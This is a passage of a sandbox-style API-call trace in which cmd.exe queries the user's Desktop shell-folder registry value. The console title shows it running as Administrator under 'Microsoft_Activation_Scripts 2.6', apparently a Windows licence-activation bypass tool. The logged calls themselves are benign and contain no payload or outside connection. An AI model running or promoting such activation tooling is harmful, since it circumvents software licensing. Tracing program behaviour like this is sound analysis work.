returned 0x409 [0179.792] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0179.792] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x87a635fc78 | out: phkResult=0x87a635fc78*=0x0) returned 0x2 [0179.792] VirtualQuery (in: lpAddress=0x87a635fc64, lpBuffer=0x87a635fbe0, dwLength=0x30 | out: lpBuffer=0x87a635fbe0*(BaseAddress=0x87a635f000, AllocationBase=0x87a6260000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0179.792] VirtualQuery (in: lpAddress=0x87a6260000, lpBuffer=0x87a635fbe0, dwLength=0x30 | out: lpBuffer=0x87a635fbe0*(BaseAddress=0x87a6260000, AllocationBase=0x87a6260000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0179.792] VirtualQuery (in: lpAddress=0x87a6261000, lpBuffer=0x87a635fbe0, dwLength=0x30 | out: lpBuffer=0x87a635fbe0*(BaseAddress=0x87a6261000, AllocationBase=0x87a6260000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0179.792] VirtualQuery (in: lpAddress=0x87a6264000, lpBuffer=0x87a635fbe0, dwLength=0x30 | out: lpBuffer=0x87a635fbe0*(BaseAddress=0x87a6264000, AllocationBase=0x87a6260000, AllocationProtect=0x4, __alignment1=0xfffff803, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffff8000)) returned 0x30 [0179.792] VirtualQuery (in: lpAddress=0x87a6360000, lpBuffer=0x87a635fbe0, dwLength=0x30 | out: lpBuffer=0x87a635fbe0*(BaseAddress=0x87a6360000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0xfffff803, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0xffff8000)) returned 0x30 [0179.792] GetConsoleOutputCP () returned 0x1b5 [0179.793] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.793] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7bd712ad0, Add=1) returned 1 [0179.793] _get_osfhandle (_FileHandle=1) returned 0x84 [0179.793] SetConsoleMode (hConsoleHandle=0x84, dwMode=0x0) returned 0 [0179.793] _get_osfhandle (_FileHandle=1) returned 0x84 [0179.793] GetConsoleMode (in: hConsoleHandle=0x84, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0179.793] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.793] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.794] GetEnvironmentStringsW () returned 0x2303ec35c20* [0179.794] GetProcessHeap () returned 0x2303ec30000 [0179.794] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfbe) returned 0x2303ec36bf0 [0179.794] memcpy (in: _Dst=0x2303ec36bf0, _Src=0x2303ec35c20, _Size=0xfbe | out: _Dst=0x2303ec36bf0) returned 0x2303ec36bf0 [0179.794] FreeEnvironmentStringsA (penv="=") returned 1 [0179.794] GetProcessHeap () returned 0x2303ec30000 [0179.794] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x8) returned 0x2303ec32630 [0179.794] GetEnvironmentStringsW () returned 0x2303ec35c20* [0179.794] GetProcessHeap () returned 0x2303ec30000 [0179.794] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfbe) returned 0x2303ec37bc0 [0179.794] memcpy (in: _Dst=0x2303ec37bc0, _Src=0x2303ec35c20, _Size=0xfbe | out: _Dst=0x2303ec37bc0) returned 0x2303ec37bc0 [0179.794] FreeEnvironmentStringsA (penv="=") returned 1 [0179.794] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x87a635eb28 | out: phkResult=0x87a635eb28*=0x78) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x0, lpData=0x87a635eb40*=0x50, lpcbData=0x87a635eb24*=0x1000) returned 0x2 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x1, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x0, lpData=0x87a635eb40*=0x1, lpcbData=0x87a635eb24*=0x1000) returned 0x2 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x0, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x40, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x40, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x0, lpData=0x87a635eb40*=0x40, lpcbData=0x87a635eb24*=0x1000) returned 0x2 [0179.795] RegCloseKey (hKey=0x78) returned 0x0 [0179.795] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x87a635eb28 | out: phkResult=0x87a635eb28*=0x78) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x0, lpData=0x87a635eb40*=0x40, lpcbData=0x87a635eb24*=0x1000) returned 0x2 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x1, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x0, lpData=0x87a635eb40*=0x1, lpcbData=0x87a635eb24*=0x1000) returned 0x2 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x0, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x9, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x4, lpData=0x87a635eb40*=0x9, lpcbData=0x87a635eb24*=0x4) returned 0x0 [0179.795] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0x87a635eb20, lpData=0x87a635eb40, lpcbData=0x87a635eb24*=0x1000 | out: lpType=0x87a635eb20*=0x0, lpData=0x87a635eb40*=0x9, lpcbData=0x87a635eb24*=0x1000) returned 0x2 [0179.795] RegCloseKey (hKey=0x78) returned 0x0 [0179.796] time (in: timer=0x0 | out: timer=0x0) returned 0x662cc6ea [0179.796] srand (_Seed=0x662cc6ea) [0179.796] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop" [0179.796] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop" [0179.796] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0179.796] GetProcessHeap () returned 0x2303ec30000 [0179.796] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x218) returned 0x2303ec38bc0 [0179.796] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2303ec38bd0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0179.796] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0179.796] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0179.796] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0179.796] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0179.796] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0179.796] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0179.796] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0179.796] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0179.796] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0179.797] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0179.797] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0179.797] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0179.797] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0179.797] GetProcessHeap () returned 0x2303ec30000 [0179.797] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x38) returned 0x2303ec38de0 [0179.797] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x87a635f930 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0179.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32", nBufferLength=0x104, lpBuffer=0x87a635f930, lpFilePart=0x87a635f910 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x87a635f910*="System32") returned 0x13 [0179.797] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0179.798] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0x87a635f640 | out: lpFindFileData=0x87a635f640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x2303ec30720 [0179.798] FindClose (in: hFindFile=0x2303ec30720 | out: hFindFile=0x2303ec30720) returned 1 [0179.798] memcpy (in: _Dst=0x87a635f936, _Src=0x87a635f66c, _Size=0xe | out: _Dst=0x87a635f936) returned 0x87a635f936 [0179.798] FindFirstFileW (in: lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x87a635f640 | out: lpFindFileData=0x87a635f640*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x2303ec30720 [0179.798] FindClose (in: hFindFile=0x2303ec30720 | out: hFindFile=0x2303ec30720) returned 1 [0179.799] memcpy (in: _Dst=0x87a635f946, _Src=0x87a635f66c, _Size=0x10 | out: _Dst=0x87a635f946) returned 0x87a635f946 [0179.799] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0179.799] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0179.799] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0179.799] GetProcessHeap () returned 0x2303ec30000 [0179.800] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec36bf0) returned 1 [0179.800] GetEnvironmentStringsW () returned 0x2303ec36830* [0179.800] GetProcessHeap () returned 0x2303ec30000 [0179.800] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfbe) returned 0x2303ec3b2e0 [0179.800] memcpy (in: _Dst=0x2303ec3b2e0, _Src=0x2303ec36830, _Size=0xfbe | out: _Dst=0x2303ec3b2e0) returned 0x2303ec3b2e0 [0179.801] FreeEnvironmentStringsA (penv="=") returned 1 [0179.801] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0179.801] GetProcessHeap () returned 0x2303ec30000 [0179.801] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec38de0) returned 1 [0179.801] GetProcessHeap () returned 0x2303ec30000 [0179.801] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x4016) returned 0x2303ec3c2b0 [0179.802] GetProcessHeap () returned 0x2303ec30000 [0179.802] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xd8) returned 0x2303ec30720 [0179.802] GetProcessHeap () returned 0x2303ec30000 [0179.802] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec3c2b0) returned 1 [0179.802] GetConsoleOutputCP () returned 0x1b5 [0179.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.804] GetUserDefaultLCID () returned 0x409 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff7bd72d6a0, cchData=8 | out: lpLCData=":") returned 2 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x87a635fa60, cchData=128 | out: lpLCData="0") returned 2 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x87a635fa60, cchData=128 | out: lpLCData="0") returned 2 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x87a635fa60, cchData=128 | out: lpLCData="1") returned 2 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff7bd72d6b0, cchData=8 | out: lpLCData="/") returned 2 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff7bd72d700, cchData=32 | out: lpLCData="Mon") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff7bd72d740, cchData=32 | out: lpLCData="Tue") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff7bd72d780, cchData=32 | out: lpLCData="Wed") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff7bd72d7c0, cchData=32 | out: lpLCData="Thu") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff7bd72d800, cchData=32 | out: lpLCData="Fri") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff7bd72d840, cchData=32 | out: lpLCData="Sat") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff7bd72d880, cchData=32 | out: lpLCData="Sun") returned 4 [0179.804] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff7bd72d6c0, cchData=8 | out: lpLCData=".") returned 2 [0179.805] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff7bd72d6e0, cchData=8 | out: lpLCData=",") returned 2 [0179.805] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0179.806] GetProcessHeap () returned 0x2303ec30000 [0179.806] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x0, Size=0x20c) returned 0x2303ec368a0 [0179.806] GetConsoleTitleW (in: lpConsoleTitle=0x2303ec368a0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.806] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0179.806] GetProcAddress (hModule=0x7ffbed570000, lpProcName="CopyFileExW") returned 0x7ffbed598940 [0179.806] GetProcAddress (hModule=0x7ffbed570000, lpProcName="IsDebuggerPresent") returned 0x7ffbed597460 [0179.806] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0179.807] GetProcessHeap () returned 0x2303ec30000 [0179.807] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x4012) returned 0x2303ec3c2b0 [0179.807] GetProcessHeap () returned 0x2303ec30000 [0179.807] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec3c2b0) returned 1 [0179.808] _wcsicmp (_String1="reg", _String2=")") returned 73 [0179.808] _wcsicmp (_String1="FOR", _String2="reg") returned -12 [0179.808] _wcsicmp (_String1="FOR/?", _String2="reg") returned -12 [0179.808] _wcsicmp (_String1="IF", _String2="reg") returned -9 [0179.808] _wcsicmp (_String1="IF/?", _String2="reg") returned -9 [0179.808] _wcsicmp (_String1="REM", _String2="reg") returned 6 [0179.808] _wcsicmp (_String1="REM/?", _String2="reg") returned 6 [0179.808] GetProcessHeap () returned 0x2303ec30000 [0179.808] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xb0) returned 0x2303ec36ac0 [0179.808] GetProcessHeap () returned 0x2303ec30000 [0179.808] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x18) returned 0x2303ec30800 [0179.810] GetProcessHeap () returned 0x2303ec30000 [0179.810] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xce) returned 0x2303ec36b80 [0179.811] GetConsoleTitleW (in: lpConsoleTitle=0x87a635f950, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.811] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0179.811] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0179.811] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0179.811] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0179.812] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0179.812] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0179.812] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0179.812] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0179.812] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0179.812] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0179.812] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0179.812] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0179.812] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0179.812] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0179.812] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0179.812] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0179.812] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0179.812] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0179.812] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0179.812] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0179.812] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0179.812] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0179.812] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0179.812] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0179.812] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0179.812] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0179.812] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0179.812] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0179.812] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0179.812] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0179.812] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0179.812] _wcsicmp (_String1="reg", _String2="START") returned -1 [0179.812] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0179.812] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0179.812] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0179.812] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0179.813] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0179.813] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0179.813] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0179.813] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0179.813] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0179.813] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0179.813] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0179.813] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0179.813] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0179.813] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0179.813] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0179.813] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0179.813] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0179.813] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0179.813] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0179.813] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0179.813] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0179.813] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0179.813] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0179.813] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0179.813] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0179.813] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0179.813] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0179.813] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0179.813] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0179.813] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0179.813] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0179.813] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0179.813] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0179.814] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0179.814] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0179.814] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0179.814] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0179.814] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0179.814] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0179.814] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0179.814] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0179.814] _wcsicmp (_String1="reg", _String2="START") returned -1 [0179.814] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0179.814] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0179.814] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0179.814] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0179.814] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0179.814] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0179.814] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0179.814] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0179.814] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0179.814] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0179.814] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0179.814] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0179.814] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0179.814] GetProcessHeap () returned 0x2303ec30000 [0179.814] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x218) returned 0x2303ec36c60 [0179.814] GetProcessHeap () returned 0x2303ec30000 [0179.814] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xd6) returned 0x2303ec36e80 [0179.815] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0179.815] GetProcessHeap () returned 0x2303ec30000 [0179.815] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x420) returned 0x2303ec36f60 [0179.815] SetErrorMode (uMode=0x0) returned 0x0 [0179.815] SetErrorMode (uMode=0x1) returned 0x0 [0179.815] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2303ec36f70, lpFilePart=0x87a635f1f0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x87a635f1f0*="System32") returned 0x13 [0179.815] SetErrorMode (uMode=0x0) returned 0x1 [0179.815] GetProcessHeap () returned 0x2303ec30000 [0179.815] RtlReAllocateHeap (Heap=0x2303ec30000, Flags=0x0, Ptr=0x2303ec36f60, Size=0x40) returned 0x2303ec36f60 [0179.815] GetProcessHeap () returned 0x2303ec30000 [0179.815] RtlSizeHeap (HeapHandle=0x2303ec30000, Flags=0x0, MemoryPointer=0x2303ec36f60) returned 0x40 [0179.816] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0179.816] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.816] GetProcessHeap () returned 0x2303ec30000 [0179.816] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xee) returned 0x2303ec36fb0 [0179.816] GetProcessHeap () returned 0x2303ec30000 [0179.816] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x1cc) returned 0x2303ec370b0 [0179.822] GetProcessHeap () returned 0x2303ec30000 [0179.822] RtlReAllocateHeap (Heap=0x2303ec30000, Flags=0x0, Ptr=0x2303ec370b0, Size=0xf0) returned 0x2303ec370b0 [0179.822] GetProcessHeap () returned 0x2303ec30000 [0179.822] RtlSizeHeap (HeapHandle=0x2303ec30000, Flags=0x0, MemoryPointer=0x2303ec370b0) returned 0xf0 [0179.822] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0179.822] GetProcessHeap () returned 0x2303ec30000 [0179.822] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfc) returned 0x2303ec371b0 [0179.824] GetProcessHeap () returned 0x2303ec30000 [0179.824] 